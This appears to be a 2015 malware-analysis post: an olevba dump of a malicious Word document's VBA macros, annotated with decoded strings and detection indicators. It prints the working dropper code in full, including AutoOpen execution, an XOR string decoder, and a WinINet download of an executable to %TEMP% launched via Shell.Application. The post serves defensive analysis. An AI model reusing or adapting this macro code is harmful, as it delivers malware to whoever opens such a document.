dynamoo

Malicious Word macro (olevba 0.25 dump of APIPO1.doc: AutoOpen chain that XOR-decodes its strings, downloads an executable over WinINet into the user's temp folder and runs it via Shell.Application)

Mar 31st, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- APIPO1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: APIPO1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: APIPO1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' AutoOpen: Word runs this as soon as the document is opened with macros
      ' enabled (olevba's AutoExec hit above). It does nothing itself except
      ' call ALBACAL3 (module OIDL8), the first link in the dropper chain:
      ' autoopen -> ALBACAL3 -> ITSALLABAMA -> ITSALBATROS -> Sub1.
  16. ALBACAL3
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO OIDL8.bas
  27. in file: APIPO1.doc - OLE stream: u'Macros/VBA/OIDL8'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36. Sub ALBACAL3()
      ' Chain hop 2: AutoOpen -> ALBACAL3 -> ITSALLABAMA (module IDL4).
      ' CHEG is filler only: ITSALLABAMA never reads its parameter. Passing it
      ' in parentheses forces by-value evaluation, which changes nothing here.
  37. Dim CHEG As Integer
  38. CHEG = 81
  39. ITSALLABAMA (CHEG)
  40.  
  41. End Sub
  42.  
  43. Public Function KALLKKKASKAJJAS(IIIIIBRDA1 As String, IIIIIBRDA2 As String) As String
      ' String decoder used for every obfuscated constant in this document
      ' (the WIIIN34DIS* constants in module PIDLE0).
      '   IIIIIBRDA1 - XOR key; every call site passes WIIIN34DIS2 ("sdivjiijwdvdnlkvmw").
      '   IIIIIBRDA2 - ciphertext as a hex string, two hex digits per output character.
      ' Returns the plaintext. For hex pair number i (1-based) the byte is XORed
      ' with key character ((i Mod Len(key)) + 1): the key is consumed starting
      ' from its SECOND character and wraps, so a re-implementation that starts
      ' at key(1) will produce garbage. Detection: a Val("&H" & Mid$(...)) loop
      ' feeding Chr(x Xor y) is a compact static signature for this family.
  44.     Dim ZINGMAH30 As Long
  45.     Dim ZINGMAH30O As String
  46.     Dim ZINGMAH300 As Integer
  47.     Dim ZINGMAH3001 As Integer
         ' Loop bound is Len(ciphertext) / 2; LEFUNCLE1 is just Len() under
         ' another name, split across continuation lines to defeat greps.
  48.     For ZINGMAH30 = 1 _
  49.     To _
  50.     ( _
  51.     LEFUNCLE1 _
  52.     (IIIIIBRDA2) _
  53.     / 2)
             ' Cipher byte: hex pair at positions 2i-1..2i, parsed via the "&H" prefix.
  54.         ZINGMAH300 = Val("&H" & _
  55.         (Mid$(IIIIIBRDA2, _
  56.         (2 * ZINGMAH30) - 1, 2)))
             ' Key byte: note the "+ 1" after Mod - key(1) is first used at i = Len(key).
  57.         ZINGMAH3001 = Asc(Mid$(IIIIIBRDA1, _
  58.         ((ZINGMAH30 Mod Len(IIIIIBRDA1)) + 1), 1))
  59.         ZINGMAH30O = ZINGMAH30O + Chr(ZINGMAH300 Xor ZINGMAH3001)
  60.     Next ZINGMAH30
  61.    KALLKKKASKAJJAS = ZINGMAH30O
  62. End Function
  63.  
  64. Public Function LEFUNCLE1(Papapa1 As String) As Integer
      ' Len() hidden behind a second name so the decoder's loop bound does not
      ' read as "Len(hex) / 2". Returns a 16-bit Integer, so it would overflow
      ' for ciphertext longer than 32767 characters; the constants in this
      ' document are at most 70 characters.
  65. LEFUNCLE1 = Len(Papapa1)
  66. End Function
  67.  
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+---------+-----------------------------------------+
  71. | Type       | Keyword | Description                             |
  72. +------------+---------+-----------------------------------------+
  73. | Suspicious | Chr     | May attempt to obfuscate specific       |
  74. |            |         | strings                                 |
  75. | Suspicious | Xor     | May attempt to obfuscate specific       |
  76. |            |         | strings                                 |
  77. +------------+---------+-----------------------------------------+
  78. -------------------------------------------------------------------------------
  79. VBA MACRO PIDLE0.bas
  80. in file: APIPO1.doc - OLE stream: u'Macros/VBA/PIDLE0'
  81. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  82.  
  83. #If VBA7 And Win64 Then
      ' WinINet imports under meaningless aliases. Both branches declare the
      ' same four functions; only the handle type differs (LongPtr on 64-bit
      ' Office, Long otherwise), so the dropper runs on either bitness.
      ' Mapping, for reading the calls in module SIDL22:
      '   SEEEGMATICKS122  = InternetOpenA      (session; sAgent becomes the User-Agent)
      '   SEEEGMATICKS1    = InternetOpenUrlA   (open the download URL)
      '   SEEEGMATICKS21   = InternetReadFile   (read the body into a String buffer)
      '   SEEEGMATICKS1222 = InternetCloseHandle
      ' Detection: a Declare of wininet.dll entry points behind an Alias is a
      ' strong static indicator by itself; olevba lists the DLL as an IOC.
  84. Public Declare PtrSafe Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  85. Public Declare PtrSafe Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  86. Public Declare PtrSafe Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  87. Public Declare PtrSafe Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  88. #Else
      ' 32-bit Office / pre-VBA7: identical imports with plain Long handles.
  89. Public Declare Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  90. Public Declare Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  91. Public Declare Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  92. Public Declare Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  93. #End If
  94.  
  95.  
  96. Public Const WIIIN34DIS6 = "3701130605472B07141A0D0D0D1F1F0219"
      ' ^ decodes (KALLKKKASKAJJAS with key WIIIN34DIS2) to "Shell.Application"
      '   - the COM object whose .Open launches the dropped file in Sub1.
  97. Public Const WIIIN34DIS5 = "38021D0B0D0D0B0753144A0B140E"
      ' ^ decodes to "\kkaddap7b.exe" - the payload file name, appended to the
      '   temp folder path in Sub1 (host IOC: %TEMP%\kkaddap7b.exe).
  98. Public Const WIIIN34DIS4 = "0C1D021A5346450F0D170A1D040A1418141B050711440A06075851424B595445131512"
      ' ^ decodes to the download URL, written defanged here:
      '   hxxp://xianshabuchang[.]com/54/78.exe  (network IOC, 2015-era; fetched
      '   by TDSHKAMPOT2122 over plain HTTP, so it is visible to proxies/IDS).
  99. Public Const WIIIN34DIS3 = "370A0403191D031903582207000E2514040701043908030C0903"
      ' ^ decodes to "Scripting.FileSystemObject" - used for the temp folder
      '   lookup, FileExists and DeleteFile in Sub1/Sub2/Sub3.
  100. Public Const WIIIN34DIS2 = "sdivjiijwdvdnlkvmw"
       ' ^ the XOR key itself, stored in clear. olevba's "Base64 Strings" hit
       '   on this module is most likely its heuristic matching these same
       '   hex/key strings - there is no real base64 here.
  101.  
  102.  
  103.  
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+----------------+-----------------------------------------+
  108. | Type       | Keyword        | Description                             |
  109. +------------+----------------+-----------------------------------------+
  110. | Suspicious | Lib            | May run code from a DLL                 |
  111. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  112. |            |                | be used to obfuscate strings (option    |
  113. |            |                | --decode to see all)                    |
  114. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  115. |            |                | may be used to obfuscate strings        |
  116. |            |                | (option --decode to see all)            |
  117. | IOC        | wininet.dll    | Executable file name                    |
  118. +------------+----------------+-----------------------------------------+
  119. -------------------------------------------------------------------------------
  120. VBA MACRO IDL4.bas
  121. in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL4'
  122. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  123. Sub ITSALLABAMA(IHMAPARAM1828 As Long)
       ' Chain hop 3. Neither the Long parameter nor the string literal handed
       ' to ITSALBATROS is read by anything; both exist only to lengthen the
       ' call chain and make the modules look like they carry real arguments.
  124.  
  125. ITSALBATROS ("OOOOOOOAOANNNNNN3112221")
  126. End Sub
  127.  
  128.  
  129. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  130. ANALYSIS:
  131. No suspicious keyword or IOC found.
  132. -------------------------------------------------------------------------------
  133. VBA MACRO FILE6.bas
  134. in file: APIPO1.doc - OLE stream: u'Macros/VBA/FILE6'
  135. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  136.  
  137. Public Const THEPARAMK23 = "KAKAJIDO"   ' dead constant: not referenced in any extracted module
  138.  
  139.  
  140. Public _
  141. Function ITSALBATROS(PERKADO _
  142. As _
  143. String)
       ' Chain hop 4: PERKADO is ignored; all real work happens in Sub1.
       ' The signature is split across continuation lines, presumably so a
       ' naive "Function NAME(" pattern does not match on one line.
  144. Sub1
  145. End Function
  146. Public Function Sub1()
       ' Dropper body. Builds <temp>\kkaddap7b.exe, removes any stale copy,
       ' downloads the payload there via TDSHKAMPOT2122 (module SIDL22) and
       ' launches it with Shell.Application.Open. The "For x = 0 To 0 / If x = 5
       ' Then End" blocks scattered through it are junk: the loop variable can
       ' never equal 5, so End is unreachable and they only pad the code.
  147.  
  148. Dim OOOOOOO8888888  As Object
  149. Set OOOOOOO8888888 = CreateObject _
  150. (KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
       ' ^ WIIIN34DIS3 decodes to "Scripting.FileSystemObject".
  151.  
  152. Dim KLALAKKSKKNNCN0 As Integer
  153. For KLALAKKSKKNNCN0 = 0 To 0
  154. If KLALAKKSKKNNCN0 = 5 Then End
  155. Next KLALAKKSKKNNCN0
  156. Dim ETOPART98 As Object
  157. Set ETOPART98 = Sub2(OOOOOOO8888888)
       ' ^ Sub2 = FSO.GetSpecialFolder(2), i.e. the TemporaryFolder Folder object.
  158. Dim ZS67AASCCS As Integer
  159. For ZS67AASCCS = 0 To 0
  160. If ZS67AASCCS = 5 Then End
  161. Next ZS67AASCCS
  162. Dim HAZ82767
  163. ASDFKJF = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS5)
  164. HAZ82767 = ETOPART98 & ASDFKJF
       ' ^ Concatenating the Folder object uses its default property (Path);
       '   WIIIN34DIS5 decodes to "\kkaddap7b.exe", so HAZ82767 is the full
       '   destination path. ASDFKJF is undeclared (no Option Explicit here).
  165. Dim LOOO9371003942732 As Integer
  166. For LOOO9371003942732 = 6 To 10
  167. If LOOO9371003942732 = 5 Then End
  168. Next LOOO9371003942732
  169. 'Set OOOOOOO8888888 = CreateObject _
  170. '(KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
  171. Dim NSMSBSDSAS7 As Integer
  172. For NSMSBSDSAS7 = 0 To 0
  173. If NSMSBSDSAS7 = 5 Then End
  174. Next NSMSBSDSAS7
  175.  
       ' Delete a previous copy first. Open ... For Binary in the downloader
       ' does not truncate, so without this a longer stale file would keep its tail.
  176. If Sub3(OOOOOOO8888888, HAZ82767) Then
  177. OOOOOOO8888888. _
  178. DeleteFile HAZ82767
  179. End If
       ' Download. The Boolean result is tested but both outcomes fall through:
       ' there is no guard, so the launch below is attempted even when the
       ' download failed and the file does not exist.
  180. If TDSHKAMPOT2122(HAZ82767) Then
  181. End If
  182. Set SSSS = Nothing
       ' ^ SSSS is never assigned anywhere; noise.
  183. If Sub3(OOOOOOO8888888, HAZ82767) Then
  184. End If
       ' ^ second existence check, result discarded.
  185. Set SASASA = CreateObject _
  186. (KALLKKKASKAJJAS _
  187. (WIIIN34DIS2, WIIIN34DIS6))
       ' ^ WIIIN34DIS6 decodes to "Shell.Application"; .Open on an .exe path
       '   executes it. Detection: winword.exe creating an .exe under %TEMP%
       '   followed by a child process spawned from that path.
  188. SASASA.Open HAZ82767
  189. End Function
  190.  
  191. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  192. ANALYSIS:
  193. +------------+----------------+-----------------------------------------+
  194. | Type       | Keyword        | Description                             |
  195. +------------+----------------+-----------------------------------------+
  196. | Suspicious | CreateObject   | May create an OLE object                |
  197. | Suspicious | Open           | May open a file                         |
  198. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  199. |            |                | be used to obfuscate strings (option    |
  200. |            |                | --decode to see all)                    |
  201. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  202. |            |                | may be used to obfuscate strings        |
  203. |            |                | (option --decode to see all)            |
  204. +------------+----------------+-----------------------------------------+
  205. -------------------------------------------------------------------------------
  206. VBA MACRO IDL3.bas
  207. in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL3'
  208. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  209. Public Function Sub2(ByRef Ob5 As Object) As Object
       ' Ob5 is the Scripting.FileSystemObject created in Sub1. GetSpecialFolder(2)
       ' is TemporaryFolder in the FSO SpecialFolderConst enumeration (0 = Windows,
       ' 1 = System, 2 = Temporary), so this returns the %TEMP% Folder object that
       ' Sub1 turns into the payload path.
  210. Set Sub2 = Ob5.GetSpecialFolder(2)
  211. End Function
  212.  
  213. Public Function Sub3(ByRef Ob6 As Object, ByVal ascascas As String) As Boolean
       ' Thin wrapper: True if FileSystemObject Ob6 reports that path ascascas
       ' exists. Sub1 calls it once to decide whether to DeleteFile a stale
       ' payload and once more with the result ignored.
  214. If Ob6.FileExists(ascascas) Then
  215. Sub3 = True
  216. Else
  217. Sub3 = False
  218. End If
  219. End Function
  220. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  221. ANALYSIS:
  222. No suspicious keyword or IOC found.
  223. -------------------------------------------------------------------------------
  224. VBA MACRO SIDL22.bas
  225. in file: APIPO1.doc - OLE stream: u'Macros/VBA/SIDL22'
  226. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  227. Option Explicit
  228.  
  229.  
  230. Private Const IPPTDSH872 = 8162
       ' ^ size of the fixed-length read buffer / bytes requested per InternetReadFile call.
  231. Private Const IPPTDSH871 As String = "MisterZALALU"
       ' ^ passed as sAgent to InternetOpenA, so it is sent as the HTTP User-Agent.
       '   A fixed non-browser UA like this is a reliable network detection key.
  232. Private Const IPPTDSH999 = 1
       ' ^ dwAccessType for InternetOpenA. 1 matches INTERNET_OPEN_TYPE_DIRECT
       '   (no proxy) in wininet.h - confirm against the header.
  233. Private Const cCCc = &H4000000
       ' ^ dwFlags for InternetOpenUrlA. &H4000000 matches INTERNET_FLAG_NO_CACHE_WRITE
       '   (0x04000000) in wininet.h - confirm against the header.
  234. Public Function TDSHKAMPOT2122 _
  235. (ByVal ITSTO As String) As Boolean
       ' Downloader. Fetches the URL decoded from WIIIN34DIS4 over WinINet and
       ' writes the body to the file ITSTO (the <temp>\kkaddap7b.exe path built
       ' in Sub1). Returns True only if at least one byte was accumulated;
       ' returns False (without writing) if InternetOpenA or InternetOpenUrlA
       ' fails. All WinINet return values other than the handles are ignored.
  236.     #If VBA7 _
  237.     And Win64 Then
  238.         Dim LPT1 As LongPtr, LPT2 As LongPtr
  239.     #Else
  240.         Dim LPT1 As Long, LPT2 As Long
  241.     #End If
  242.     Dim CDSFDFD As Long
  243.     Dim SA33LOOOOMMA442 As String * IPPTDSH872, CCEWGREHRHERHER33 As String
  244.     Dim EFEWFWEFWEFWEF As Integer, lddta As Double
         ' Session: User-Agent "MisterZALALU", direct access, no proxy strings.
  245.     LPT1 = SEEEGMATICKS122(IPPTDSH871, IPPTDSH999, vbNullString, vbNullString, 0)
  246.     If LPT1 = 0 Then
  247.         Exit Function
  248.     End If
  249.     Dim ITSFROM As String
  250.     ITSFROM = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS4)
         ' ^ decodes to hxxp://xianshabuchang[.]com/54/78.exe (defanged).
  251.    
         ' Open the URL with dwFlags = cCCc (&H4000000) and no extra headers.
  252.     LPT2 = SEEEGMATICKS1(LPT1, ITSFROM, vbNullString, 0, cCCc, 0)
  253.     If LPT2 = 0 Then
  254.         lddta = 0
  255.     Else
             ' First chunk: the WHOLE 8162-character buffer is appended regardless
             ' of how many bytes InternetReadFile actually filled in; only later
             ' chunks are trimmed with Mid(..., 1, CDSFDFD). A body shorter than
             ' the buffer therefore gets trailing buffer contents on disk.
  256.         SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
  257.         CCEWGREHRHERHER33 = SA33LOOOOMMA442
  258.         Do While CDSFDFD <> 0
  259.             SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
  260.            
  261.             Dim SSSDFDSFLLSLLS As Integer
  262. For SSSDFDSFLLSLLS = 0 To 0
  263. If SSSDFDSFLLSLLS = 5 Then End
  264. Next SSSDFDSFLLSLLS
                 ' ^ junk loop, End is unreachable (variable is only ever 0).
  265.            
  266.             CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(SA33LOOOOMMA442, 1, CDSFDFD)
  267.         Loop
         ' lddta <> 0 iff something was read; that is the success flag returned below.
  268.         lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
  269.         Open ITSTO _
  270.         For Binary _
  271.         Access Write _
  272.         Lock Write _
  273.         As #EFEWFWEFWEFWEF
  274.         Put #EFEWFWEFWEFWEF, _
  275.         , CCEWGREHRHERHER33
         ' NOTE(review): the payload passes through a VBA String (the Declare
         ' takes the buffer ByVal As String, so it is ANSI-marshalled) and is
         ' written back with Put. Whether arbitrary binary bytes survive that
         ' round trip depends on the code page; the author relied on it working.
  276.         ':
  277.        
  278.         Dim ssdcdcdsDDDDD As Integer
  279. For ssdcdcdsDDDDD = 0 To 0
  280. If ssdcdcdsDDDDD = 5 Then End
  281. Next ssdcdcdsDDDDD
  282.         Close #EFEWFWEFWEFWEF
  283.     End If
         ' Close both handles (LPT2 may be 0 on URL failure) and drop the buffer.
  284.     SEEEGMATICKS1222 LPT2
  285.     SEEEGMATICKS1222 LPT1
  286.     CCEWGREHRHERHER33 = ""
  287.     If lddta Then
  288.         TDSHKAMPOT2122 = True
  289.     End If
         ' Detection: outbound HTTP from winword.exe with User-Agent "MisterZALALU",
         ' followed by a file create/write of an .exe under %TEMP%.
  290. End Function
  291. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  292. ANALYSIS:
  293. +------------+----------------+-----------------------------------------+
  294. | Type       | Keyword        | Description                             |
  295. +------------+----------------+-----------------------------------------+
  296. | Suspicious | Open           | May open a file                         |
  297. | Suspicious | Write          | May write to a file (if combined with   |
  298. |            |                | Open)                                   |
  299. | Suspicious | Put            | May write to a file (if combined with   |
  300. |            |                | Open)                                   |
  301. | Suspicious | Binary         | May read or write a binary file (if     |
  302. |            |                | combined with Open)                     |
  303. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  304. |            |                | may be used to obfuscate strings        |
  305. |            |                | (option --decode to see all)            |
  306. +------------+----------------+-----------------------------------------+
  307. -------------------------------------------------------------------------------
  308. VBA MACRO UserForm1.frm
  309. in file: APIPO1.doc - OLE stream: u'Macros/VBA/UserForm1'
  310. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  311. (empty macro)